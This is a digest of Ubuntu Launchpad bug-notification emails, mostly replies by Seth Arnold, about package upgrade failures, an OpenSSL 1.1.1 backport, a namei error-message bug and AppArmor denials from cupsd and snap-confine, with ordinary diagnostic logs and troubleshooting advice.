[Touch-packages] [Bug 1819817] Re: package libselinux1:amd64 2.7-2build2 failed to install/upgrade: пакет libselinux1:amd64 2.7-2build2 не может быть настроен, так как libselinux1:i386 другой версии (

[Seth Arnold]

Hello,

dpkg: ошибка при обработке пакета libselinux1:amd64 (--configure):
 пакет libselinux1:amd64 2.7-2build2 не может быть настроен, так как 
libselinux1:i386 другой версии (2.2.2-1ubuntu0.1)

You have an i386 version of 14.04's libselinux1 installed and the
upgrade tool tried to install the amd64 version of 18.04's libselinux1.

None of the tools expect to skip an LTS release, I don't know how well
upgrading from 14.04 LTS to 18.04 LTS directly will go. Does this sound
familiar?

The tools also expect i386 and amd64 versions of packages to be kept in
lockstep if you are going to have them both installed simultaneously. If
you don't know why the i386 versions are installed, maybe you can make
some progress by purging them with eg apt-get purge libselinu1:i386

I hope this helps.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libselinux in Ubuntu.
https://bugs.launchpad.net/bugs/1819817

Title:
  package libselinux1:amd64 2.7-2build2 failed to install/upgrade: пакет
  libselinux1:amd64 2.7-2build2 не может быть настроен, так как
  libselinux1:i386 другой версии (2.2.2-1ubuntu0.1)

Status in libselinux package in Ubuntu:
  New

Bug description:
  1) The release of Ubuntu you are using, via 'lsb_release -rd' or System -> 
About Ubuntu
  Ubuntu 14.04 LTS.

  2) The version of the package you are using, via 'apt-cache policy pkgname' 
or by checking in Software Center
  apt-cache policy libselinux1
  libselinux1:
Installed: 2.7-2build2
Candidate: 2.7-2build2
Version table:
   *** 2.7-2build2 0
  500 http://ru.archive.ubuntu.com/ubuntu/ bionic/main amd64 Packages
  100 /var/lib/dpkg/status

  3) What you expected to happen
  do-release-upgrade
  My system upgraded from 14.04 to 16.04 smoothly

  4) What happened instead
  do-release-upgrade
Considering binutils-common:amd64 0 as a solution to binutils:amd64 12
Holding Back binutils:amd64 rather than change binutils-common:amd64
  Investigating (6) libc6-dev [ amd64 ] < 2.19-0ubuntu6.14 -> 2.27-3ubuntu1 > ( 
libdevel )
  Broken libc6-dev:amd64 Ломает on binutils [ amd64 ] < 2.24-5ubuntu14.2 -> 
2.30-21ubuntu1~18.04 > ( devel ) (< 2.26)
Considering binutils:amd64 12 as a solution to libc6-dev:amd64 39
Upgrading binutils:amd64 due to Breaks field in libc6-dev:amd64
  Investigating (6) binutils [ amd64 ] < 2.24-5ubuntu14.2 -> 
2.30-21ubuntu1~18.04 > ( devel )
  Broken binutils:amd64 Зависит on binutils-common [ amd64 ] < none -> 
2.30-21ubuntu1~18.04 > ( devel ) (= 2.30-21ubuntu1~18.04)
Considering binutils-common:amd64 0 as a solution to binutils:amd64 12
Holding Back binutils:amd64 rather than change binutils-common:amd64
  Investigating (7) libc6-dev [ amd64 ] < 2.19-0ubuntu6.14 -> 2.27-3ubuntu1 > ( 
libdevel )
  Broken libc6-dev:amd64 Ломает on binutils [ amd64 ] < 2.24-5ubuntu14.2 -> 
2.30-21ubuntu1~18.04 > ( devel ) (< 2.26)
Considering binutils:amd64 12 as a solution to libc6-dev:amd64 39
Upgrading binutils:amd64 due to Breaks field in libc6-dev:amd64
  Investigating (7) binutils [ amd64 ] < 2.24-5ubuntu14.2 -> 
2.30-21ubuntu1~18.04 > ( devel )
  Broken binutils:amd64 Зависит on binutils-common [ amd64 ] < none -> 
2.30-21ubuntu1~18.04 > ( devel ) (= 2.30-21ubuntu1~18.04)
Considering binutils-common:amd64 0 as a solution to binutils:amd64 12
Holding Back binutils:amd64 rather than change binutils-common:amd64
  Investigating (8) libc6-dev [ amd64 ] < 2.19-0ubuntu6.14 -> 2.27-3ubuntu1 > ( 
libdevel )
  Broken libc6-dev:amd64 Ломает on binutils [ amd64 ] < 2.24-5ubuntu14.2 -> 
2.30-21ubuntu1~18.04 > ( devel ) (< 2.26)
Considering binutils:amd64 12 as a solution to libc6-dev:amd64 39
Upgrading binutils:amd64 due to Breaks field in libc6-dev:amd64
  Investigating (8) binutils [ amd64 ] < 2.24-5ubuntu14.2 -> 
2.30-21ubuntu1~18.04 > ( devel )
  Broken binutils:amd64 Зависит on binutils-common [ amd64 ] < none -> 
2.30-21ubuntu1~18.04 > ( devel ) (= 2.30-21ubuntu1~18.04)
Considering binutils-common:amd64 0 as a solution to binutils:amd64 12
Holding Back binutils:amd64 rather than change binutils-common:amd64
  Investigating (9) libc6-dev [ amd64 ] < 2.19-0ubuntu6.14 -> 2.27-3ubuntu1 > ( 
libdevel )
  Broken libc6-dev:amd64 Ломает on binutils [ amd64 ] < 2.24-5ubuntu14.2 -> 
2.30-21ubuntu1~18.04 > ( devel ) (< 2.26)
Considering binutils:amd64 12 as a solution to libc6-dev:amd64 39
Upgrading binutils:amd64 due to Breaks field in libc6-dev:amd64
  Investigating (9) binutils [ amd64 ] < 2.24-5ubuntu14.2 -> 
2.30-21ubuntu1~18.04 > ( devel )
  Broken binutils:amd64 Зависит on binutils-common [ amd64 ] < none -> 
2.30-21ubuntu1~18.04 > ( devel ) (= 2.30-21ubuntu1~18.04)
Considering binutils-common:amd64 0 as a solution to binutils:amd64 12
Holding Back binutils:amd64 rather than change binutils-common:amd64
  Done

  Повреждённые пакеты

  Система содержит повреждённые пакеты, которые не 

Re: [Touch-packages] [Bug 1797386] Re: [SRU] OpenSSL 1.1.1 to 18.04 LTS

[Seth Arnold]

On Tue, Mar 12, 2019 at 04:05:45PM -, Dimitri John Ledkov wrote:
> defaults. And all of them however have committed to drop support for
> those in 2020. My expectation is to follow suit, and set default
> security level to 2, and require TLS1.2 shortly after 19.10 release.

Can you expand upon this point a bit?

Do you mean we will require tls 1.2 across all our supported releases
at the same time?

Or do you mean we will require tls 1.2 for 19.10 and newer? Will this be
done as part of rolling out 19.10 or will we push an update to 19.10 that
will change behaviour?

Or something else?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1797386

Title:
  [SRU] OpenSSL 1.1.1 to 18.04 LTS

Status in openssl package in Ubuntu:
  In Progress
Status in libio-socket-ssl-perl source package in Bionic:
  New
Status in libnet-ssleay-perl source package in Bionic:
  New
Status in nova source package in Bionic:
  New
Status in openssl source package in Bionic:
  Incomplete
Status in python-cryptography source package in Bionic:
  New
Status in python2.7 source package in Bionic:
  New
Status in python3.6 source package in Bionic:
  New
Status in python3.7 source package in Bionic:
  New
Status in r-cran-openssl source package in Bionic:
  Fix Committed
Status in ruby-openssl source package in Bionic:
  Fix Committed
Status in ruby2.5 source package in Bionic:
  New

Bug description:
  [Impact]

   * OpenSSL 1.1.1 is an LTS release upstream, which will continue to
  receive security support for much longer than 1.1.0 series will.

   * OpenSSL 1.1.1 comes with support for TLS v1.3 which is expected to
  be rapidly adopted due to increased set of supported hashes & algoes,
  as well as improved handshake [re-]negotiation.

   * OpenSSL 1.1.1 comes with improved hw-acceleration capabilities.

   * OpenSSL 1.1.1 is ABI/API compatible with 1.1.0, however some
  software is sensitive to the negotiation handshake and may either need
  patches/improvements or clamp-down to maximum v1.2.

  [Test Case]

   * Rebuild all reverse dependencies

   * Execute autopkg tests for all of them

   * Clamp down to TLS v1.2 software that does not support TLS v1.3
  (e.g. mongodb)

   * Backport TLS v1.3 support patches, where applicable

  [Regression Potential]

   * Connectivity interop is the biggest issues which will be
  unavoidable with introducing TLS v1.3. However, tests on cosmic
  demonstrate that curl/nginx/google-chrome/mozilla-firefox connect and
  negotiate TLS v1.3 without issues.

   * Mitigation of discovered connectivity issues will be possible by
  clamping down to TLS v1.2 in either server-side or client-side
  software or by backporting relevant support fixes

   * Notable changes are listed here
  https://wiki.openssl.org/index.php/TLS1.3

   * Most common connectivity issues so far:
     - client verifies SNI in TLSv1.3 mode, yet client doesn't set hostname. 
Solution is client change to set hostname, or to clamp down the client to 
TLSv1.2.

     - session negotiation is different in TLSv1.3, existing client code
  may fail to create/negotiate/resume session. Clients need to learn how
  to use session callback.

   * This update bundles python 3.6 and 3.7 point releases

  [Other Info]

   * Previous FFe for OpenSSL in 18.10 is at
     https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1793092

   * TLS v1.3 support in NSS is expected to make it to 18.04 via
  security updates

   * TLS v1.3 support in GnuTLS is expected to be available in 19.04

   * Test OpenSSL is being prepared in
     https://launchpad.net/~ci-train-ppa-service/+archive/ubuntu/3473

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1797386/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1818679] Re: package openssh-server 1:7.2p2-4ubuntu2.8 failed to install/upgrade: le sous-processus script post-installation installé a retourné une erreur de sortie d'état 1

[Seth Arnold]

Hello, can you please run this command and report back the results?

ls -ld /

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1818679

Title:
  package openssh-server 1:7.2p2-4ubuntu2.8 failed to install/upgrade:
  le sous-processus script post-installation installé a retourné une
  erreur de sortie d'état 1

Status in openssh package in Ubuntu:
  New

Bug description:
  I can't tell you anything. There was a error message without specific
  details.

  ProblemType: Package
  DistroRelease: Ubuntu 16.04
  Package: openssh-server 1:7.2p2-4ubuntu2.8
  ProcVersionSignature: Ubuntu 4.4.0-142.168-generic 4.4.167
  Uname: Linux 4.4.0-142-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2.18
  Architecture: amd64
  Date: Tue Mar  5 06:48:59 2019
  ErrorMessage: le sous-processus script post-installation installé a retourné 
une erreur de sortie d'état 1
  InstallationDate: Installed on 2016-08-12 (935 days ago)
  InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 
(20160420.1)
  RelatedPackageVersions:
   dpkg 1.18.4ubuntu1.5
   apt  1.2.29ubuntu0.1
  SSHDConfig: Error: command ['/usr/sbin/sshd', '-T'] failed with exit code 
255: Missing privilege separation directory: /var/run/sshd
  SourcePackage: openssh
  Title: package openssh-server 1:7.2p2-4ubuntu2.8 failed to install/upgrade: 
le sous-processus script post-installation installé a retourné une erreur de 
sortie d'état 1
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1818679/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1818691] Re: package openssh-server 1:7.2p2-4ubuntu2.8 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1

[Seth Arnold]

Hello, can you please run this command and report back the results?

ls -ld /

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1818691

Title:
  package openssh-server 1:7.2p2-4ubuntu2.8 failed to install/upgrade:
  subprocess installed post-installation script returned error exit
  status 1

Status in openssh package in Ubuntu:
  New

Bug description:
  .

  ProblemType: Package
  DistroRelease: Ubuntu 16.04
  Package: openssh-server 1:7.2p2-4ubuntu2.8
  ProcVersionSignature: Ubuntu 4.15.0-45.48~16.04.1-generic 4.15.18
  Uname: Linux 4.15.0-45-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2.18
  Architecture: amd64
  Date: Tue Mar  5 15:29:31 2019
  ErrorMessage: subprocess installed post-installation script returned error 
exit status 1
  InstallationDate: Installed on 2019-01-21 (43 days ago)
  InstallationMedia: Ubuntu 16.04.5 LTS "Xenial Xerus" - Release amd64 
(20180731)
  RelatedPackageVersions:
   dpkg 1.18.4ubuntu1.5
   apt  1.2.29ubuntu0.1
  SSHDConfig: Error: command ['/usr/sbin/sshd', '-T'] failed with exit code 
255: Missing privilege separation directory: /var/run/sshd
  SourcePackage: openssh
  Title: package openssh-server 1:7.2p2-4ubuntu2.8 failed to install/upgrade: 
subprocess installed post-installation script returned error exit status 1
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1818691/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1818564] [NEW] directory permission sanity checks

[Seth Arnold]

Public bug reported:

Hello, we've received a surprising number of bug reports that include
lines from ufw's sanity checks on / permissions are incorrect; it's been
a recurring feature of systemd-tmpfiles bug reports as well.

I think apport should include a similar report if / /etc /lib /usr /tmp
etc have incorrect user, group, or permissions.

Thanks

** Affects: apport (Ubuntu)
 Importance: Undecided
 Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1818564

Title:
  directory permission sanity checks

Status in apport package in Ubuntu:
  New

Bug description:
  Hello, we've received a surprising number of bug reports that include
  lines from ufw's sanity checks on / permissions are incorrect; it's
  been a recurring feature of systemd-tmpfiles bug reports as well.

  I think apport should include a similar report if / /etc /lib /usr
  /tmp etc have incorrect user, group, or permissions.

  Thanks

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1818564/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1818548] [NEW] namei -l incorrect error message

[Seth Arnold]

Public bug reported:

Hello, namei -l gives incorrect error messages if a directory is not
readable:

$ namei -l /etc/ssl/private/ssl-cert-snakeoil.key
f: /etc/ssl/private/ssl-cert-snakeoil.key
drwxr-xr-x root root /
drwxr-xr-x root root etc
drwxr-xr-x root root ssl
drwx--x--- root ssl-cert private
 ssl-cert-snakeoil.key - No such file or directory
$ cat /etc/ssl/private/ssl-cert-snakeoil.key
cat: /etc/ssl/private/ssl-cert-snakeoil.key: Permission denied
$ ls -l /etc/ssl/private/
ls: cannot open directory '/etc/ssl/private/': Permission denied


"No such file or directory" is a poor error message for this case. The correct 
error message (as shown by cat) is "Permission denied".

Incorrect error messages make this tool much less useful.

Thanks

ProblemType: Bug
DistroRelease: Ubuntu 18.04
Package: util-linux 2.31.1-0.4ubuntu3.3
ProcVersionSignature: Ubuntu 4.15.0-45.48-generic 4.15.18
Uname: Linux 4.15.0-45-generic x86_64
NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
ApportVersion: 2.20.9-0ubuntu7.5
Architecture: amd64
Date: Mon Mar  4 09:00:12 2019
InstallationDate: Installed on 2012-10-18 (2328 days ago)
InstallationMedia: Ubuntu 12.04.1 LTS "Precise Pangolin" - Release amd64 
(20120823.1)
ProcEnviron:
 TERM=rxvt-unicode-256color
 PATH=(custom, no user)
 XDG_RUNTIME_DIR=
 LANG=en_US.UTF-8
 SHELL=/bin/bash
SourcePackage: util-linux
UpgradeStatus: Upgraded to bionic on 2018-05-02 (306 days ago)

** Affects: util-linux (Ubuntu)
 Importance: Undecided
 Status: New


** Tags: amd64 apport-bug bionic

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to util-linux in Ubuntu.
https://bugs.launchpad.net/bugs/1818548

Title:
  namei -l incorrect error message

Status in util-linux package in Ubuntu:
  New

Bug description:
  Hello, namei -l gives incorrect error messages if a directory is not
  readable:

  $ namei -l /etc/ssl/private/ssl-cert-snakeoil.key
  f: /etc/ssl/private/ssl-cert-snakeoil.key
  drwxr-xr-x root root /
  drwxr-xr-x root root etc
  drwxr-xr-x root root ssl
  drwx--x--- root ssl-cert private
   ssl-cert-snakeoil.key - No such file or directory
  $ cat /etc/ssl/private/ssl-cert-snakeoil.key
  cat: /etc/ssl/private/ssl-cert-snakeoil.key: Permission denied
  $ ls -l /etc/ssl/private/
  ls: cannot open directory '/etc/ssl/private/': Permission denied

  
  "No such file or directory" is a poor error message for this case. The 
correct error message (as shown by cat) is "Permission denied".

  Incorrect error messages make this tool much less useful.

  Thanks

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: util-linux 2.31.1-0.4ubuntu3.3
  ProcVersionSignature: Ubuntu 4.15.0-45.48-generic 4.15.18
  Uname: Linux 4.15.0-45-generic x86_64
  NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
  ApportVersion: 2.20.9-0ubuntu7.5
  Architecture: amd64
  Date: Mon Mar  4 09:00:12 2019
  InstallationDate: Installed on 2012-10-18 (2328 days ago)
  InstallationMedia: Ubuntu 12.04.1 LTS "Precise Pangolin" - Release amd64 
(20120823.1)
  ProcEnviron:
   TERM=rxvt-unicode-256color
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  SourcePackage: util-linux
  UpgradeStatus: Upgraded to bionic on 2018-05-02 (306 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/util-linux/+bug/1818548/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

Re: [Touch-packages] [Bug 1571531] Re: cupsd cause apparmor denials for /etc/ld.so.preload

[Seth Arnold]

On Thu, Feb 28, 2019 at 04:08:09AM -, Edson José dos Santos wrote:
> edson@edson-p6540br:~$ dmesg | grep DENIED
> [   58.334359] audit: type=1400 audit(1551326278.953:59): apparmor="DENIED" 
> operation="open" profile="/usr/lib/snapd/snap-confine" 
> name="/opt/eset/esets/lib/libesets_pac.so" pid=1109 comm="snap-confine" 
> requested_mask="r" denied_mask="r" fsuid=0 ouid=0

Excellent, much better!

Now we just need our snapd friends to tell us the proper way an admin
can add rules to the snap-confine profile.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1571531

Title:
  cupsd cause apparmor denials for /etc/ld.so.preload

Status in apparmor package in Ubuntu:
  New
Status in snapd package in Ubuntu:
  New

Bug description:
  There is a constant flood of messages in dmesg:

  [ 4431.638163] audit: type=1400 audit(1460962510.272:60): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10559 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661208] audit: type=1400 audit(1460962510.296:61): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661390] audit: type=1400 audit(1460962510.296:62): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661759] audit: type=1400 audit(1460962510.296:63): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.661936] audit: type=1400 audit(1460962510.296:64): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661937] audit: type=1400 audit(1460962510.296:65): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.662534] audit: type=1400 audit(1460962510.296:66): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 5081.410342] audit: type=1400 audit(1460963160.033:67): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10810 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 5081.446507] audit: type=1400 audit(1460963160.069:68): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10815 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: cups-daemon 2.1.3-4
  ProcVersionSignature: Ubuntu 4.4.0-18.34-generic 4.4.6
  Uname: Linux 4.4.0-18-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2
  Architecture: amd64
  CupsErrorLog:
   
  CurrentDesktop: X-Cinnamon
  Date: Mon Apr 18 10:56:37 2016
  EcryptfsInUse: Yes
  InstallationDate: Installed on 2013-07-19 (1003 days ago)
  InstallationMedia: Xubuntu 13.04 "Raring Ringtail" - Release i386 (20130423.1)
  Lpstat: device for Generic-PCL-5e: socket://192.168.1.100:9100
  MachineType: LENOVO 4298R86
  Papersize: a4
  PpdFiles: Error: command ['fgrep', '-H', '*NickName', 
'/etc/cups/ppd/Generic-PCL-5e.ppd'] failed with exit code 2: grep: 
/etc/cups/ppd/Generic-PCL-5e.ppd: Permission denied
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.4.0-18-generic 
root=UUID=3d4ce850-6e8a-4cf5-9b82-fb135c22fe1e ro
  SourcePackage: cups
  UpgradeStatus: Upgraded to xenial on 2015-10-29 (171 days ago)
  dmi.bios.date: 12/01/2011
  dmi.bios.vendor: LENOVO
  dmi.bios.version: 8DET56WW (1.26 )
  dmi.board.asset.tag: Not Available
  dmi.board.name: 4298R86
  dmi.board.vendor: LENOVO
  dmi.board.version: Not Available
  dmi.chassis.asset.tag: No Asset Information
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: Not Available
  dmi.modalias: 
dmi:bvnLENOVO:bvr8DET56WW(1.26):bd12/01/2011:svnLENOVO:pn4298R86:pvrThinkPadX220Tablet:rvnLENOVO:rn4298R86:rvrNotAvailable:cvnLENOVO:ct10:cvrNotAvailable:
  dmi.product.name: 4298R86
  dmi.product.version: ThinkPad X220 Tablet
  dmi.sys.vendor: LENOVO
  modified.conffile..etc.default.cups:
   # Cups configure options
   
   # LOAD_LP_MODULE: enable/disable to load "lp" parallel printer driver module
   # LOAD_LP_MODULE has migrated to /etc/modules-load.d/cups-filters.conf
   # LOAD_LP_MODULE=yes
  mtime.conffile..etc.default.cups: 2014-03-12T15:11:15.740184

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1571531/+subscriptions

-- 
Mailing list: 

Re: [Touch-packages] [Bug 1571531] Re: cupsd cause apparmor denials for /etc/ld.so.preload

[Seth Arnold]

On Thu, Feb 28, 2019 at 03:04:00AM -, Edson José dos Santos wrote:
> Hello Arnold

>   unix, (connect, send, receive) peer =
(addr="@2F746D702F65736574732E736F636B00*"),

Excellent, here's the mistake. Remove everything after the comma:

  unix,

Then try the reboot again.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1571531

Title:
  cupsd cause apparmor denials for /etc/ld.so.preload

Status in apparmor package in Ubuntu:
  New
Status in snapd package in Ubuntu:
  New

Bug description:
  There is a constant flood of messages in dmesg:

  [ 4431.638163] audit: type=1400 audit(1460962510.272:60): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10559 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661208] audit: type=1400 audit(1460962510.296:61): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661390] audit: type=1400 audit(1460962510.296:62): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661759] audit: type=1400 audit(1460962510.296:63): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.661936] audit: type=1400 audit(1460962510.296:64): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661937] audit: type=1400 audit(1460962510.296:65): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.662534] audit: type=1400 audit(1460962510.296:66): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 5081.410342] audit: type=1400 audit(1460963160.033:67): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10810 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 5081.446507] audit: type=1400 audit(1460963160.069:68): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10815 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: cups-daemon 2.1.3-4
  ProcVersionSignature: Ubuntu 4.4.0-18.34-generic 4.4.6
  Uname: Linux 4.4.0-18-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2
  Architecture: amd64
  CupsErrorLog:
   
  CurrentDesktop: X-Cinnamon
  Date: Mon Apr 18 10:56:37 2016
  EcryptfsInUse: Yes
  InstallationDate: Installed on 2013-07-19 (1003 days ago)
  InstallationMedia: Xubuntu 13.04 "Raring Ringtail" - Release i386 (20130423.1)
  Lpstat: device for Generic-PCL-5e: socket://192.168.1.100:9100
  MachineType: LENOVO 4298R86
  Papersize: a4
  PpdFiles: Error: command ['fgrep', '-H', '*NickName', 
'/etc/cups/ppd/Generic-PCL-5e.ppd'] failed with exit code 2: grep: 
/etc/cups/ppd/Generic-PCL-5e.ppd: Permission denied
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.4.0-18-generic 
root=UUID=3d4ce850-6e8a-4cf5-9b82-fb135c22fe1e ro
  SourcePackage: cups
  UpgradeStatus: Upgraded to xenial on 2015-10-29 (171 days ago)
  dmi.bios.date: 12/01/2011
  dmi.bios.vendor: LENOVO
  dmi.bios.version: 8DET56WW (1.26 )
  dmi.board.asset.tag: Not Available
  dmi.board.name: 4298R86
  dmi.board.vendor: LENOVO
  dmi.board.version: Not Available
  dmi.chassis.asset.tag: No Asset Information
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: Not Available
  dmi.modalias: 
dmi:bvnLENOVO:bvr8DET56WW(1.26):bd12/01/2011:svnLENOVO:pn4298R86:pvrThinkPadX220Tablet:rvnLENOVO:rn4298R86:rvrNotAvailable:cvnLENOVO:ct10:cvrNotAvailable:
  dmi.product.name: 4298R86
  dmi.product.version: ThinkPad X220 Tablet
  dmi.sys.vendor: LENOVO
  modified.conffile..etc.default.cups:
   # Cups configure options
   
   # LOAD_LP_MODULE: enable/disable to load "lp" parallel printer driver module
   # LOAD_LP_MODULE has migrated to /etc/modules-load.d/cups-filters.conf
   # LOAD_LP_MODULE=yes
  mtime.conffile..etc.default.cups: 2014-03-12T15:11:15.740184

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1571531/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

Re: [Touch-packages] [Bug 1571531] Re: cupsd cause apparmor denials for /etc/ld.so.preload

[Seth Arnold]

On Wed, Feb 27, 2019 at 12:59:14PM -, Edson José dos Santos wrote:
> Hi, Arnold
> 
> At startup the error message is appearing in apparmor and I would like
> to know how to generate a log to introduce them to you or just the boot
> boot log. In the absence of this I got this other log, where it points
> several flaws.

> Feb 27 09:37:29 edson-p6540br systemd-tmpfiles[482]: 
> [/usr/lib/tmpfiles.d/spice-vdagentd.conf:2] Line references path below legacy 
> directory /var/run/, updating /var/run/spice-vdagentd → /run/spice-vdagentd; 
> please update the tmpfiles.d/ drop-in file accordingly.
> Feb 27 09:37:29 edson-p6540br apparmor[376]: Erro do analisador AppArmor para 
> /etc/apparmor.d/usr.bin.man in /etc/apparmor.d/abstractions/base na linha 
> 168: syntax error, unexpected TOK_OPENPAREN, expecting TOK_ID or TOK_MODE or 
> TOK_SET_VAR
> Feb 27 09:37:29 edson-p6540br apparmor[376]: Erro do analisador AppArmor para 
> /etc/apparmor.d/sbin.dhclient in /etc/apparmor.d/abstractions/base na linha 
> 168: syntax error, unexpected TOK_OPENPAREN, expecting TOK_ID or TOK_MODE or 
> TOK_SET_VAR

Hello Edson, this means there's an error, probably in
/etc/apparmor.d/abstractions/base , and probably it is near the end.

Can you paste the last ten or twenty lines of that file?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1571531

Title:
  cupsd cause apparmor denials for /etc/ld.so.preload

